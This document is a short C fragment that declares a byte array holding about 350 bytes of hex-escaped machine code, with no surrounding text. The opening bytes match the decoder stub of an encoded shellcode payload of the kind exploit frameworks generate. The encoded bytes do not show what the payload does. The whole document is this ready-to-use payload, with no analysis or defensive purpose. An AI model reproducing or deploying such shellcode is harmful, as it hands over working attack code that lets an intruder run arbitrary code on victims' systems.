unsigned char buf[] = 
"\xdb\xd7\xba\x1c\xf5\xf5\x11\xd9\x74\x24\xf4\x58\x29\xc9"
"\xb1\x52\x83\xc0\x04\x31\x50\x13\x03\x4c\xe6\x17\xe4\x90"
"\xe0\x5a\x07\x68\xf1\x3a\x81\x8d\xc0\x7a\xf5\xc6\x73\x4b"
"\x7d\x8a\x7f\x20\xd3\x3e\x0b\x44\xfc\x31\xbc\xe3\xda\x7c"
"\x3d\x5f\x1e\x1f\xbd\xa2\x73\xff\xfc\x6c\x86\xfe\x39\x90"
"\x6b\x52\x91\xde\xde\x42\x96\xab\xe2\xe9\xe4\x3a\x63\x0e"
"\xbc\x3d\x42\x81\xb6\x67\x44\x20\x1a\x1c\xcd\x3a\x7f\x19"
"\x87\xb1\x4b\xd5\x16\x13\x82\x16\xb4\x5a\x2a\xe5\xc4\x9b"
"\x8d\x16\xb3\xd5\xed\xab\xc4\x22\x8f\x77\x40\xb0\x37\xf3"
"\xf2\x1c\xc9\xd0\x65\xd7\xc5\x9d\xe2\xbf\xc9\x20\x26\xb4"
"\xf6\xa9\xc9\x1a\x7f\xe9\xed\xbe\xdb\xa9\x8c\xe7\x81\x1c"
"\xb0\xf7\x69\xc0\x14\x7c\x87\x15\x25\xdf\xc0\xda\x04\xdf"
"\x10\x75\x1e\xac\x22\xda\xb4\x3a\x0f\x93\x12\xbd\x70\x8e"
"\xe3\x51\x8f\x31\x14\x78\x54\x65\x44\x12\x7d\x06\x0f\xe2"
"\x82\xd3\x80\xb2\x2c\x8c\x60\x62\x8d\x7c\x09\x68\x02\xa2"
"\x29\x93\xc8\xcb\xc0\x6e\x9b\x33\xbc\xbb\xcc\xdc\xbf\x3b"
"\xf2\xa7\x49\xdd\x9e\xc7\x1f\x76\x37\x71\x3a\x0c\xa6\x7e"
"\x90\x69\xe8\xf5\x17\x8e\xa7\xfd\x52\x9c\x50\x0e\x29\xfe"
"\xf7\x11\x87\x96\x94\x80\x4c\x66\xd2\xb8\xda\x31\xb3\x0f"
"\x13\xd7\x29\x29\x8d\xc5\xb3\xaf\xf6\x4d\x68\x0c\xf8\x4c"
"\xfd\x28\xde\x5e\x3b\xb0\x5a\x0a\x93\xe7\x34\xe4\x55\x5e"
"\xf7\x5e\x0c\x0d\x51\x36\xc9\x7d\x62\x40\xd6\xab\x14\xac"
"\x67\x02\x61\xd3\x48\xc2\x65\xac\xb4\x72\x89\x67\x7d\x92"
"\x68\xad\x88\x3b\x35\x24\x31\x26\xc6\x93\x76\x5f\x45\x11"
"\x07\xa4\x55\x50\x02\xe0\xd1\x89\x7e\x79\xb4\xad\x2d\x7a"
"\x9d";
